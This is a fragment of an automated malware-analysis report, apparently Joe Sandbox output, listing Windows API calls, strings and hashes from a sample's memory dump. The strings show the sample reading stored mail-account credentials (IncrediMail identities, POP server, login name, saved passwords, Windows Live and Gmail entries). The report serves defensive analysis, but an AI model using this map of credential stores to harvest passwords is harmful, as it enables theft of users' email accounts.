                                                            • sprintf.MSVCRT ref: 00403083
                                                            • memset.MSVCRT ref: 004030B4
                                                            • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                            • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$Close$EnumOpensprintf
                                                            • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                            • API String ID: 3672803090-3168940695
                                                            • Opcode ID: c2fb41edc4bda7a0edf8d5371692b0db7420076daff6a6cdf3d8eefb2c67b369
                                                            • Instruction ID: c63447841566cf46c771af6046a8c2292ff1b2fb78a85e5f221a3b25c3a6e5c2
                                                            • Opcode Fuzzy Hash: c2fb41edc4bda7a0edf8d5371692b0db7420076daff6a6cdf3d8eefb2c67b369
                                                            • Instruction Fuzzy Hash: 8C3140B280121CBEDB11EF91CC81EDEBB7CEF14345F0440A6B908A1052E7799F959FA4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                            • String ID: 0$6
                                                            • API String ID: 3540791495-3849865405
                                                            • Opcode ID: 3531e9c810b83e1c9a81e25a42051b0a33e7210e19b9d911fdb8999888636a2e
                                                            • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                            • Opcode Fuzzy Hash: 3531e9c810b83e1c9a81e25a42051b0a33e7210e19b9d911fdb8999888636a2e
                                                            • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                            APIs
                                                            • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                            • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                            • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                            • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                            Strings
                                                            • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                            • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                            • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                            • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FromStringUuid$FreeTaskmemcpy
                                                            • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                            • API String ID: 1640410171-2022683286
                                                            • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                            • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                            • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                            • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                            APIs
                                                              • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                            • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                            • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$strlen
                                                            • String ID: -journal$-wal$immutable$nolock
                                                            • API String ID: 2619041689-3408036318
                                                            • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                            • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                            • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                            • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$strlen
                                                            • String ID:
                                                            • API String ID: 667451143-3916222277
                                                            • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                            • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                            • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                            • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(comctl32.dll,75D50A60,?,00000000,?,?,?,0040CF60,75D50A60), ref: 00404AB8
                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75D50A60), ref: 00404ADE
                                                            • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                            • API String ID: 2780580303-317687271
                                                            • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                            • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                            • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                            • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                            APIs
                                                            • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                                            • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                                            • strlen.MSVCRT ref: 00406CCC
                                                            • _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
                                                            • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                                            • _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                            • String ID: Unknown Error$netmsg.dll
                                                            • API String ID: 2881943006-572158859
                                                            • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                            • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                            • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                            • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                            APIs
                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                            • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                            • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                            • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                              • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                            • API String ID: 888011440-2039793938
                                                            • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                            • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                            • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                            • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                            APIs
                                                            Strings
                                                            • cannot ATTACH database within transaction, xrefs: 0042E966
                                                            • database is already attached, xrefs: 0042EA97
                                                            • unable to open database: %s, xrefs: 0042EBD6
                                                            • out of memory, xrefs: 0042EBEF
                                                            • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                            • database %s is already in use, xrefs: 0042E9CE
                                                            • too many attached databases - max %d, xrefs: 0042E951
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                            • API String ID: 1297977491-2001300268
                                                            • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                            • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                            • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                            • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                            APIs
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A3E
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A4C
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A5D
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A74
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A7D
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,75D50A60,?,00000000), ref: 00409C53
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,75D50A60,?,00000000), ref: 00409C6F
                                                            • memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,75D50A60), ref: 00409C97
                                                            • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,75D50A60), ref: 00409CB4
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,75D50A60), ref: 00409D3D
                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,75D50A60), ref: 00409D47
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,75D50A60), ref: 00409D7F
                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75D50A60), ref: 00408EBE
                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408E31
                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                            • String ID: 0wE$d
                                                            • API String ID: 2915808112-1552800882
                                                            • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                            • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                            • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                            • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                            APIs
                                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                            • strchr.MSVCRT ref: 0040327B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringstrchr
                                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                            • API String ID: 1348940319-1729847305
                                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                            APIs
                                                            • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                            • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                            • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                            • API String ID: 3510742995-3273207271
                                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 00405E80
                                                            • GetWindow.USER32(?,00000005), ref: 00405E98
                                                            • GetWindow.USER32(00000000), ref: 00405E9B
                                                              • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                              • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                            • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                            • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                            • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                            • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                            • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                            • SetFocus.USER32(00000000), ref: 00405EF3
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$Rect$ClientFocusPoints
                                                            • String ID:
                                                            • API String ID: 2432066023-0
                                                            • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                            • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                            • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                            • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                            APIs
                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                            • memset.MSVCRT ref: 0040FA1E
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                            • _strnicmp.MSVCRT ref: 0040FA4F
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                            • String ID: WindowsLive:name=*$windowslive:name=
                                                            • API String ID: 945165440-3589380929
                                                            • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                            • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                            • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                            • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                            APIs
                                                              • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                              • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                              • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                              • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                            • strchr.MSVCRT ref: 0040371F
                                                            • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                            • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                            • strlen.MSVCRT ref: 00403778
                                                            • sprintf.MSVCRT ref: 0040379C
                                                            • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                            • String ID: %s@gmail.com
                                                            • API String ID: 3261640601-4097000612
                                                            • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                            • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                            • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                            • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                            APIs
                                                            • memset.MSVCRT ref: 004094C8
                                                            • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                            • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                            • memset.MSVCRT ref: 0040950C
                                                            • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                            • _strcmpi.MSVCRT ref: 00409531
                                                              • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                            • String ID: sysdatetimepick32
                                                            • API String ID: 3411445237-4169760276
                                                            • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                            • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                            • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                            • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                            • EndDialog.USER32(?,00000002), ref: 00405A96
                                                            • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                              • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                              • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                              • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                            • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
